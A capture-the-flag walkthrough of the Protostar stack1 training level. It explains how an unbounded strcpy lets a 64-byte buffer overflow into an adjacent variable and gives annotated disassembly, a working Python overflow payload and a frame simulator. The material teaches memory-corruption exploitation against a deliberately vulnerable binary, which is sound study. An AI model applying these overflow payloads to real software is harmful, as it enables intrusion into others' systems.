Binary Exploitation Protostar Stack1 - Walkthrough / Writeup

Posted by Suraj Singh on April 07, 2018 · 8 mins read
Hello Guyz,




In this post, I am going to show you how we can beat the Protostar stack1 level. Today's tutorial focuses on variable overwriting: we are going to learn a simple technique that overwrites the value of a variable on the stack while the program is running.

Before starting this walkthrough, I want to highlight a few points.

  • I'm not the creator of the Protostar war game. I am just a player.
  • Here, I am just providing hints and references, so that if you feel stuck anywhere, you can take a look here.


Source code (stack1.c):

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <err.h>          /* errx() */

int main(int argc, char **argv)
{
  volatile int modified;  /* sits right after buffer on the stack (esp+0x5c) */
  char buffer[64];        /* 64 bytes starting at esp+0x1c */

  if(argc == 1) {
      errx(1, "please specify an argument\n");
  }

  modified = 0;
  strcpy(buffer, argv[1]);  /* no length check: anything past 64 bytes spills into modified */

  if(modified == 0x61626364) {
      printf("you have correctly got the variable to the right value\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
}




Hint provided by Exploit Exercises:

This level looks at the concept of modifying variables to specific values in the program, and how the variables are laid out in memory.

This level is at /opt/protostar/bin/stack1

If you are unfamiliar with the hexadecimal being displayed, “man ascii” is your friend.
Protostar is little endian.

Solution:

We simply need to overwrite the value of the modified variable, which is located on the stack right after buffer.
Before we start, let's understand the situation on the stack. The offsets below are relative to esp after the prologue (see the disassembly that follows): buffer starts at esp+0x1c (28), modified sits at esp+0x5c (92), and the frame is 0x60 (96) bytes.


esp+0 (0)            esp+0x1c (28)                                          esp+0x5c (92)   esp+0x60 (96)
=========================================================================================================
Other things         | buffer[64] (injectable area)                        | modified      |
=========================================================================================================


Disassembly of main (gdb, Intel syntax):

   0x08048464 <+0>:   push   ebp
   0x08048465 <+1>:   mov    ebp,esp
   0x08048467 <+3>:   and    esp,0xfffffff0
   0x0804846a <+6>:   sub    esp,0x60                      << ====== 0x60 = 96 bytes of stack frame reserved (holds buffer[64] and modified)
   0x0804846d <+9>:   cmp    DWORD PTR [ebp+0x8],0x1       << ====== compare argc with 1
   0x08048471 <+13>:  jne    0x8048487 <main+35>           << ====== if argc != 1, skip the errx() call
   0x08048473 <+15>:  mov    DWORD PTR [esp+0x4],0x80485a0
   0x0804847b <+23>:  mov    DWORD PTR [esp],0x1
   0x08048482 <+30>:  call   0x8048388 <errx@plt>
   0x08048487 <+35>:  mov    DWORD PTR [esp+0x5c],0x0      << ===== modified = 0; the variable lives at esp+0x5c (offset 92)
   0x0804848f <+43>:  mov    eax,DWORD PTR [ebp+0xc]       << ===== eax = argv
   0x08048492 <+46>:  add    eax,0x4                       << ===== eax = &argv[1]
   0x08048495 <+49>:  mov    eax,DWORD PTR [eax]           << ===== eax = argv[1] (pointer to our string)
   0x08048497 <+51>:  mov    DWORD PTR [esp+0x4],eax       << ===== second strcpy argument: the source string
   0x0804849b <+55>:  lea    eax,[esp+0x1c]                << ===== buffer starts at esp+0x1c (offset 28); 28 + 64 = 92, exactly where modified sits
   0x0804849f <+59>:  mov    DWORD PTR [esp],eax           << ===== first strcpy argument: the destination buffer
   0x080484a2 <+62>:  call   0x8048368 <strcpy@plt>        << ===== unbounded copy: bytes 65..68 of argv[1] land on modified
   0x080484a7 <+67>:  mov    eax,DWORD PTR [esp+0x5c]      << ===== reload modified
   0x080484ab <+71>:  cmp    eax,0x61626364                << ===== compare with the target value
   0x080484b0 <+76>:  jne    0x80484c0 <main+92>
   0x080484b2 <+78>:  mov    DWORD PTR [esp],0x80485bc
   0x080484b9 <+85>:  call   0x8048398 <puts@plt>          << ===== "you have correctly got the variable to the right value"
   0x080484be <+90>:  jmp    0x80484d5 <main+113>
   0x080484c0 <+92>:  mov    edx,DWORD PTR [esp+0x5c]
   0x080484c4 <+96>:  mov    eax,0x80485f3
   0x080484c9 <+101>: mov    DWORD PTR [esp+0x4],edx
   0x080484cd <+105>: mov    DWORD PTR [esp],eax
   0x080484d0 <+108>: call   0x8048378 <printf@plt>        << ===== "Try again, you got 0x%08x" with the current value of modified
   0x080484d5 <+113>: leave
   0x080484d6 <+114>: ret



Exploit

#!/usr/bin/env python3
# -*- coding:utf-8 -*-
import struct
import sys

# Usage: python3 exploit.py > tmp ; /opt/protostar/bin/stack1 $(cat tmp)

# 64 bytes fill buffer[64] exactly (esp+0x1c up to esp+0x5c)
payload = b"a" * 64
# the next 4 bytes land on modified at esp+0x5c; "<I" packs 0x61626364
# little endian, i.e. the bytes "dcba", which is what the compare expects
payload += struct.pack("<I", 0x61626364)

# write the raw bytes with no trailing newline so $(cat tmp) passes them unchanged
sys.stdout.buffer.write(payload)
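To make the layout reasoning concrete, here is an added example (my own code, not part of the original walkthrough or the Protostar project): it derives the filler length from the two offsets in the disassembly above, refuses a payload containing a NUL byte (strcpy would stop there, and the shell cannot pass one in argv anyway), and models the frame so you can see what value main() would print for a given argv[1]. The function names and the frame model are my assumptions.

```python
import struct

BUFFER_OFF = 0x1c     # lea eax,[esp+0x1c]            : start of buffer[64]
MODIFIED_OFF = 0x5c   # mov DWORD PTR [esp+0x5c],0x0  : the 'modified' variable
FRAME_SIZE = 0x60     # sub esp,0x60
TARGET = 0x61626364   # value main() compares modified against


def build_payload(target=TARGET, buffer_off=BUFFER_OFF, modified_off=MODIFIED_OFF):
    """Fill from the start of buffer up to modified, then append the target.

    The filler length is not hard-coded: it is the distance between the two
    stack offsets read from the disassembly (0x5c - 0x1c = 64 bytes).
    """
    filler_len = modified_off - buffer_off
    payload = b"A" * filler_len + struct.pack("<I", target)  # little endian
    # argv[1] is a C string: a NUL would terminate the copy early.
    if b"\x00" in payload:
        raise ValueError("payload contains a NUL byte; strcpy would truncate it")
    return payload


def simulate_stack1(argv1, buffer_off=BUFFER_OFF, modified_off=MODIFIED_OFF):
    """Model main()'s frame: modified is zeroed, then strcpy copies argv1 plus
    its terminating NUL into buffer.  Returns the value main() would print
    in "Try again, you got 0x%08x" (or compare against TARGET).
    """
    frame = bytearray(FRAME_SIZE)
    frame[modified_off:modified_off + 4] = struct.pack("<I", 0)  # modified = 0
    data = argv1 + b"\x00"          # strcpy copies the terminator as well
    # slice assignment may grow the bytearray: that is the overflow past the frame
    frame[buffer_off:buffer_off + len(data)] = data
    return struct.unpack("<I", frame[modified_off:modified_off + 4])[0]


if __name__ == "__main__":
    p = build_payload()
    print("payload:", p)
    print("modified would be 0x%08x" % simulate_stack1(p))
    # endianness pitfall: sending the ASCII "abcd" gives 0x64636261, not 0x61626364
    print("with 'abcd':      0x%08x" % simulate_stack1(b"A" * 64 + b"abcd"))
```

Feeding the simulator a too-short or off-by-one string reproduces the partial values the real binary reports, which is a quick way to check an offset before touching the target.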



Very Easy! Hahaha.


For a more detailed walkthrough, check the YouTube video playlist linked below.

Bitforestinfo YouTube Protostar CTF Playlist